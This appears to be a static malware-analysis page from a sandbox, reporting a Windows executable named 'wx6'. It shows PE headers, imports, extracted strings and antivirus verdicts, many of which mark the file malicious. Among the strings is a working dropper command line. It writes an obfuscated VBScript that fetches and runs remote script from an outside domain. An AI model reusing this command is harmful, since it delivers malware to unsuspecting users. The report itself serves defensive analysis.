Static | ZeroBOX

PE Compile Time

2023-09-13 09:42:55

PDB Path

C:\U2\wx6\Release\wx6.pdb

PE Imphash

9dcc2fb8fef0355edecee5c713257e9c

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0000e4ae 0x0000e600 6.55265160706
.rdata 0x00010000 0x00006358 0x00006400 4.8577109453
.data 0x00017000 0x000015ac 0x00000a00 2.035836263
.rsrc 0x00019000 0x00045660 0x00045800 6.61698724369
.reloc 0x0005f000 0x00000f90 0x00001000 6.47437783788

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0003bad0 0x00022844 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x0003bad0 0x00022844 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MENU 0x0005e330 0x0000004a LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_DIALOG 0x0005e390 0x00000120 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x0005e4b0 0x0000002c LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ACCELERATOR 0x0005e380 0x00000010 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_GROUP_ICON 0x0005e318 0x00000014 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_GROUP_ICON 0x0005e318 0x00000014 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x0005e4e0 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library USER32.dll:
0x41011c DispatchMessageW
0x410120 GetMessageW
0x410124 DefWindowProcW
0x410128 DestroyWindow
0x41012c CreateWindowExW
0x410130 EndDialog
0x410134 RegisterClassExW
0x410138 LoadAcceleratorsW
0x41013c LoadStringW
0x410140 ShowWindow
0x410144 EndPaint
0x41014c TranslateMessage
0x410150 LoadIconW
0x410154 LoadCursorW
0x410158 PostQuitMessage
0x41015c DialogBoxParamW
0x410160 UpdateWindow
0x410164 BeginPaint
Library KERNEL32.dll:
0x410000 GetModuleFileNameW
0x410004 DecodePointer
0x410008 WriteConsoleW
0x41000c CreateFileW
0x410010 SetFilePointerEx
0x410014 GetConsoleMode
0x410018 GetConsoleOutputCP
0x41001c FlushFileBuffers
0x410020 HeapReAlloc
0x410024 HeapSize
0x410028 GetProcessHeap
0x41002c LCMapStringW
0x410030 CompareStringW
0x41003c GetCurrentProcess
0x410040 TerminateProcess
0x41004c GetCurrentProcessId
0x410050 GetCurrentThreadId
0x410058 InitializeSListHead
0x41005c IsDebuggerPresent
0x410060 GetStartupInfoW
0x410064 GetModuleHandleW
0x410068 RtlUnwind
0x41006c GetLastError
0x410070 SetLastError
0x410084 TlsAlloc
0x410088 TlsGetValue
0x41008c TlsSetValue
0x410090 TlsFree
0x410094 FreeLibrary
0x410098 GetProcAddress
0x41009c LoadLibraryExW
0x4100a0 EncodePointer
0x4100a4 RaiseException
0x4100a8 GetStdHandle
0x4100ac WriteFile
0x4100b0 ExitProcess
0x4100b4 GetModuleHandleExW
0x4100b8 HeapFree
0x4100bc CloseHandle
0x4100c0 WaitForSingleObject
0x4100c4 GetExitCodeProcess
0x4100c8 CreateProcessW
0x4100d0 HeapAlloc
0x4100d4 FindClose
0x4100d8 FindFirstFileExW
0x4100dc FindNextFileW
0x4100e0 IsValidCodePage
0x4100e4 GetACP
0x4100e8 GetOEMCP
0x4100ec GetCPInfo
0x4100f0 GetCommandLineA
0x4100f4 GetCommandLineW
0x4100f8 MultiByteToWideChar
0x4100fc WideCharToMultiByte
0x41010c SetStdHandle
0x410110 GetFileType
0x410114 GetStringTypeW

!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
URPQQh0$@
UQPXY]Y[
QQSVWd
j"^f92
j"_f9z
t^j*Yf
f9:t!V
QQSVj8j@
tl=HvA
j,h@ZA
SystPQ
emRoPf
uG9]$t
PPPPPPPP
PPPPPWV
PP9E uPPSWP
PVVVVV
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
Unknown exception
bad exception
COMSPEC
cmd.exe
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
CompareStringEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
?5Wg4p
%S#[k=
"B <1=
_hypot
_nextafter
echo|set /p=^"d57=".":bxu0="i":nv7="g":nu25=":":GetO^">%Public%\sm86fa81.vbs&echo|set /p=^"bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")^">>%Public%\sm86fa81.vbs&cd c:\windows\system32\&cmd /c start %Public%\sm86fa81.vbs
RSDSuu#
C:\U2\wx6\Release\wx6.pdb
.text$mn
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.rsrc$01
.rsrc$02
EndPaint
BeginPaint
UpdateWindow
DialogBoxParamW
PostQuitMessage
LoadCursorW
LoadIconW
TranslateMessage
TranslateAcceleratorW
DispatchMessageW
ShowWindow
LoadStringW
LoadAcceleratorsW
RegisterClassExW
EndDialog
CreateWindowExW
DestroyWindow
DefWindowProcW
GetMessageW
USER32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwind
GetLastError
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
EncodePointer
RaiseException
GetStdHandle
WriteFile
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
HeapFree
CloseHandle
WaitForSingleObject
GetExitCodeProcess
CreateProcessW
GetFileAttributesExW
HeapAlloc
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetFileType
GetStringTypeW
CompareStringW
LCMapStringW
GetProcessHeap
HeapSize
HeapReAlloc
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
SetFilePointerEx
CreateFileW
WriteConsoleW
DecodePointer
KERNEL32.dll
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0&0,030?0J0b0
1.151L1
262?2E2e2q2
4*4/4<4v4
4I5R5]5d5w5
6 606@6P6Y6
7>7M7d7j7p7v7|7
7C8P8x8
9>9G9[9a9
;#;b;h;
<1<N<z<
<6=?=G=
>7>>>M>
525S5a5g5
6(646P6p6~6
7-7X7b7
8#8-898>8C8^8h8t8y8~8
=0(1X1y1
4!464C4J4S4h4
78&8@8t8{8
;9<a<|<
=5=<=H=`=e=q=v=
?5?u?{?
3%4j4n4v4
55-5K5d5i5
6K7S7Y7
:R;k;u;
2#2.2@2K2|2
2n35467
>1>K>_>}>
? ?N?]?o?
0%0I0S0u0
88.888E8O8_8
>\?a?g?l?
/0(1r1
3g5m5{5
5+626=6K6R6X6s6z6e7
80878S8Z8q8
9-9]9f9
:>;N;y;
<-<?<Q<r<
1#2\2s2
3+30353E3J3O3_3d3i3y3~3
4'4H4U4j4s4|4
6#6(6-6H6W6b6g6l6
7<7`7w7
7/868@8d8
99:9v9
:$:u:z:
=%=*=-?G?V?d?p?|?
00-080N0b0x2
5#5J5T5
6C7I7V7
:d:);o;
3G3h3o3
4R5d5v547n8
>$>T>x>
1!212 4&4+424B4P4a4y4
6G6Q6l6
7!7)71797W7_7
?,?=?E?U?f?
!000<0K0^0}0
1'1R1t1
?+???E?
4$4A4^4{4
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5
>$>(>,>0>4>
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1 1$1(1,1014181<1@1D1H1L1P1T1X1
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
<$<,<4<<<D<L<T<\<d<l<t<|<
0(0,00080P0`0d0t0x0
686D6L6t6x6
888T8X8x8
989X9x9
:8:X:x:
686<6H6L6P6T6X6\6`6d6h6l6x6|6
Aapi-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
mscoree.dll
Aja-JP
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
Aapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
api-ms-win-core-fibers-l1-1-0
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
iE&xit
h&About ...
About wx6
MS Shell Dlg
wx6, Version 1.0
Copyright (c) 2023
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Clean
Elastic malicious (high confidence)
MicroWorld-eScan Clean
FireEye Generic.mg.87f6774e25128d08
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender Clean
K7GW Clean
Cybereason Clean
BitDefenderTheta Gen:NN.ZexaF.36662.xuW@amwLjzhi
VirIT Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 Clean
APEX Malicious
Paloalto Clean
ClamAV Clean
Kaspersky Clean
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Trojan.Generic@AI.96 (RDML:dDIpoxiglDXj0hXpLNu+UA)
Sophos Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
Trapmine Clean
CMC Clean
Emsisoft Clean
SentinelOne Static AI - Suspicious PE
GData Clean
Jiangmin Clean
Webroot Clean
Google Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Malicious (score: 100)
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac Clean
TACHYON Clean
DeepInstinct MALICIOUS
Cylance Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Trojan.Malware.300983.susgen
Fortinet Clean
AVG Clean
Avast Clean
CrowdStrike win/malicious_confidence_100% (D)
No IRMA results available.